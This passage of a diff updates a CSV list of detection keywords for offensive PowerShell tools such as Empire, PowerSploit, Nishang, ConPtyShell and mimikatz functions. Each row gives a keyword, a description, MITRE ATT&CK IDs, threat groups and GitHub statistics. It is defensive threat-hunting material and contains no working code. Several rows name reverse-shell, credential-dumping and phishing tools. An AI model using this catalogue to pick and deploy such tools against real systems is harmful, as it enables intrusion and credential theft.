Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","1","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" -"*Invoke-Certify*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-Certify*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-Certify*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-Certify*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*invokechecklocaladminaccess*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*Invoke-CheckLocalAdminAccess*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" -"*Invoke-CheckLocalAdminAccess*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-CheckLocalAdminAccess*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*invoke-checklocaladminaccess*","offensive_tool_keyword","pywerview","A partial Python rewriting of PowerSploit PowerView","T1069.002 - T1018 - T1087.001 - T1033 - T1069.001 - T1087.002 - T1016 - T1482","TA0007 - TA0009","N/A","N/A","Reconnaissance","https://github.com/the-useless-one/pywerview","1","1","N/A","N/A","8","738","102","2023-10-02T14:57:20Z","2016-07-06T13:25:09Z" -"*Invoke-ClipboardMonitor*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-ConPtyShell*","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1021 - T1071","TA0002","N/A","N/A","Exploitation tools","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","N/A","9","817","150","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" -"*Invoke-ConPtyShell*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*Invoke-ConPtyShell*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3252","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" -"*Invoke-ConPtyShell.ps1*","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1021 - T1071","TA0002","N/A","N/A","Exploitation tools","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","N/A","9","817","150","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" -"*Invoke-CreateRemoteThread*","offensive_tool_keyword","mimikatz","Invoke-Mimikatz.ps1 function name","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1","1","1","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-ClipboardMonitor*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-ConPtyShell*","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1021 - T1071","TA0002","N/A","N/A","Exploitation tools","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","N/A","9","819","150","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" +"*Invoke-ConPtyShell*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-ConPtyShell*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*Invoke-ConPtyShell.ps1*","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1021 - T1071","TA0002","N/A","N/A","Exploitation tools","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","N/A","9","819","150","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" +"*Invoke-CreateRemoteThread*","offensive_tool_keyword","mimikatz","Invoke-Mimikatz.ps1 function name","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Invoke-CredentialFilesCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Invoke-CredentialFilesCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Invoke-CredentialGuardCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Invoke-CredentialInjection*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-CredentialInjection*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1054","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-CredentialInjection*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Invoke-CredentialInjection.ps1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Invoke-CredentialInjection.ps1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Invoke-CredentialsPhish*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*Invoke-DAFT.*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*invoke-daisychain*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*Invoke-DCOM.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1091","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*invoke-dcompayload*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*Invoke-DCSync*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1056","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-DefenderExclusionsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Invoke-DinvokeKatz*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-CredentialFilesCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-CredentialGuardCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-CredentialInjection*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-CredentialInjection*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1054","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-CredentialInjection*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules 